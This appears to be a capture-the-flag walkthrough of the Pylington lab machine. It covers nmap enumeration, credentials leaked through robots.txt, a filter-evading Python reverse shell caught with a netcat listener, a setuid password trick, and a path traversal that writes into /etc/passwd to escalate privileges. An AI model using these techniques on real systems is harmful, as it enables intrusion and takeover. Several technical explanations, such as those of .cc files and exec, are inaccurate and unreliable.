Vulhub is a collection of pre-built vulnerable docker environments that are designed for learning and practicing security testing. It provides various intentionally vulnerable web applications and services for hands-on security training.
Once you have downloaded it, you need to set up the server. It is pretty easy to set up the server within VirtualBox.
Settings Up
Launch VirtualBox.
Click on Tools and then click on “Import” and import the OVA file.
Once you are done with these, click on settings and change the network adapter to the host-only adapter.
Make sure your Kali Linux Machine, from where you perform an attack, and Your Vulnerable machine are in the same network.
Once you are done with settings up, let’s start the Virtual Machines.
As you can notice, the Vulnerable Machine prompts us to input the credentials.
Enumeration
Our first step is to identify the IP Address of our Target Machine using Net Discover. Open a terminal and run the following command:
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
[sudo] password for kali:
Currently scanning: 192.168.218.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
From the Scan result, we have obtained our target IP address which is “192.168.162.7”.
Conducting Network Scans with Nmap
So, let's perform a network scan to detect what ports are open. Scanning the Network is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.
Where,
-sC is used to perform a script scan using the default set of scripts, and
-sV enables version detection, which will detect what versions are running on what port and
-p- is used to select all ports.
┌──(kali㉿kali)-[~]
└─$sudo nmap -sC -sV -p- 192.168.162.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 03:10 EDT
So let’s take a look at the web content running on Port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.
Upon navigating the webpage, we find out that Pylington is a cloud platform used to run and execute python3 programming codes.
If scroll down, then you can notice a message which indicates us, to click the Sign-Up button on the menu bar at the top of the window.
Click on the Sign Up button at the top of the window.
Upon clicking on the sign-up button, it will show us another message, that will notify us that there is an error with sign-up.
It means we can’t sign up, but if we have a login ID and a password, then we can easily log in to the server.
From the Nmap scanning, we have discovered that the “robots.txt” file exists.
80/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)
| http-robots.txt: 3 disallowed entries
|_/register /login /zbir7mn240soxhicso2z
|_http-title: Pylington Cloud | The best way to run Python.
From “robots.txt”, we find out a file that contains a disallow directive.
Disallow directive means, you can tell search engines, not to access certain files, pages, or sections of your website.
Upon navigating this page, we successfully obtained the required Username and password. As we have a username and a password, so let’s try to log in to the server.
Upon logging into the server, we serve with a Python IDE.
As per the information available on the screen, we can run the Python program through the input section, and the output will be shown below on the screen. The Python program is limited to nine lines of code.
So, we have to research to get a reverse shell Python program that will help me foothold the server.
Foothold
Upon searching on Google, I got a cheat sheet that will help for get the reverse shell.
This cheat sheet provides various Python reverse shell payloads for different scenarios. Python is a versatile language commonly used for writing reverse shell scripts due to its simplicity and cross-platform compatibility. The cheat sheet covers one-liner reverse shells, multi-line reverse shells, and reverse shell payloads for both Linux and Windows environments. It also includes examples of how to set up a listener to receive the reverse shell connection. Python reverse shells are useful for penetration testing, red teaming, and ethical hacking scenarios.
Executing Python Reverse Shell Attack to Obtain Remote Access on Pylington Cloud
Copy and paste it to the Python IDE of Pylington Cloud.
Before running the program, make sure you have enabled the listening port using NetCat from a new terminal.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 3333
listening on [any] 3333 ...
Now click on run.
Upon running the program, the security automatically detects it as a malicious program.
Try again by removing the quotation mark, but it will also not work.
After analyzing the instructions once again, I found a hint. If we run an exec along with the malicious program, then there will be a chance of bypassing the server.
exec is a functionality of an operating system that runs an executable file in the context of an already existing process, replacing the previous executable. This act is also referred to as an overlay. It is especially important in Unix-like systems, although it exists elsewhere. (Source: Wiki)
So cut the lines of codes and paste them to standard input, and in the program section write a simple program, call it through exec, and thenclick on run.
As you can notice, I got a reverse shell. Let’s make it a fully interactive shell.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [192.168.162.5] from (UNKNOWN) [192.168.162.7] 41222
Let me find out the user flag. Usually, the user flag is stored within the /home directory of the user directory.
[http@archlinux /]$ ls
ls
bin dev home lib64 mnt proc run srv tmp var
boot etc lib lost+found opt root sbin sys usr
[http@archlinux /]$
Let me change the directory to the home directory.
[http@archlinux /]$cd /home
cd /home
[http@archlinux home]$ ls
ls
py
[http@archlinux home]$
There is only one directory listed, which means the username is py. So, now change the directory to py and list the files and directories.
[http@archlinux home]$cd py
cd py
[http@archlinux py]$ ls -al
ls -al
total 56
dr-xr-xr-x 3 py py 4096 Apr 16 2021 .
drwxr-xr-x 3 root root 4096 Apr 7 2021 ..
-rw------- 1 py py 21 Dec 20 2020 .bash_logout
-rw------- 1 py py 57 Dec 20 2020 .bash_profile
-rw------- 1 py py 141 Dec 20 2020 .bashrc
-r-------- 1 py py 11 Apr 9 2021 password.txt
drwx------ 2 py py 4096 Apr 9 2021 secret_stuff
-r-sr-xr-x 1 py py 19216 Apr 9 2021 typing
-r--r--r-- 1 py py 689 Apr 9 2021 typing.cc
-r-------- 1 py py 34 Apr 9 2021 user.txt
[http@archlinux py]$
And here is the user flag. Let me read it using the cat command.
[http@archlinux py]$cat user.txt
cat user.txt
cat: user.txt: Permission denied
[http@archlinux py]$
The permission was denied, which means we must have to switch to the user, py, to access the user flag. But, we don't have any password to switch the user py.
Maybe there is a password is stored within the password.txt file. Still, we can’t access it.
-r-------- 1 py py 11 Apr 9 2021 password.txt
Let’s analyze other files and directories.
Establishing Secure and Persistent Access with SSH Tool
After analyzing the listed files and directories, I found that typing.cc contains some helpful information that may help us log into the user py.
Because the .cc is a default extension generated after compiling a program using the GNU GCC compiler.
-r-sr-xr-x 1 py py 19216 Apr 9 2021 typing
-r--r--r-- 1 py py 689 Apr 9 2021 typing.cc
Let me have a look at this file using the cat command.
[http@archlinux py]$ cat typing.cc
cat typing.cc
#include <iostream>
#include <string>
#include <iterator>
#include <fstream>
#include <algorithm>
int main(){
std::cout<<"Let's play a game! If you can type the sentence below, then I'll tell you my password.\n\n";
std::string text="the quick brown fox jumps over the lazy dog";
After analyzing, I found that the typing is an application, programmed to access the “password.txt” file. So, let me run the program. Now type the text and hit enter to get the password.
[http@archlinux py]$ ./typing
./typing
Let's play a game! If you can type the sentence below, then I'll tell you my password.
the quick brown fox jumps over the lazy dog
the quick brown fox jumps over the lazy dog
the quick brown fox jumps over the lazy dog
***********
[http@archlinux py]$
Now, we have the password and the username, so, we can perform an SSH connection using the SSH client tool.
These lines of code say to input lines of text which will be stored on a string container named a line, which will then be saved to this directory.
There is an “if” statement, which verifies whether the directory name is written properly or not. It seems to be like, there will be a chance of Path Traversal vulnerability.
Path Traversal Privilege Escalation via Backup Utility
A path traversal vulnerability allows an attacker to access files on the server to which they should not have access. They do this by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder.
So, let’s test this Python program, to prove my assumption.
The line of the text will be technoscience, andThe text will be stored in the /etc/passwd file.
[py@archlinux secret_stuff]$./backup
Enter a line of text to back up: technoscience
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd# This is called Path Traversal
[py@archlinux secret_stuff]$
Let me verify if the line of text is written to the /etc/passwd file.
redis:x:973:973:Redis in-memory data structure store:/var/lib/redis:/usr/bin/nologin
technoscience
[py@archlinux secret_stuff]$
It means we can generate a new user having the highest privilege with the help of this vulnerability. So we have to generate a salted hash using OpenSSL.